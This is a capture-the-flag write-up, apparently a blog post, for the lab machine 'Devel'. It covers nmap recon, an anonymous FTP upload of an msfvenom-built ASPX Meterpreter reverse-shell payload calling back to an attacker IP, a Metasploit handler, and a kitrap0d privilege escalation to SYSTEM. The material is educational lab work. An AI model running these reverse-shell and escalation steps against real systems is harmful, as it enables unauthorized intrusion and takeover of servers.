root@blog:~#

View on GitHub

devel

RECON

IIS Server (Windows)

recon

Nmap Scan

nmap –p- -A -T4 10.10.10.5

-allports -version -Aggressive

Port 21 allows for anonymous FTP Login

nmap

ENUMERATION

FTP Login

User: anonymous
Pass: anonymous

The connection allows files to be uploaded

ftp

Msfvenom Payload

 -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f aspx > ex aspx

msf

Metasploit Listner

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.9

msf consoel

FTP Upload

binary

Binary is more reliable than ASCII

binary

put ex.aspx

Uploads the file to 10.10.10.5/ex.aspx

ex

PRIVILEGE ESCALATION

Meterpreter session

getuid

Accessing the webpage provides a session to the application server

succ

Exploit suggestor

backround
use post/multi/recon/local_exploit_suggester
set session 1
run

sugg

Exploit list

13 possible exploits found exploit

Exploit

use exploit windows/local/ms10_015_kitrap0d
set options
run

Creates a new session with SYSTEM privileges shelld swag

Root shell

shell

shellll

Flags for user and root on desktop

flags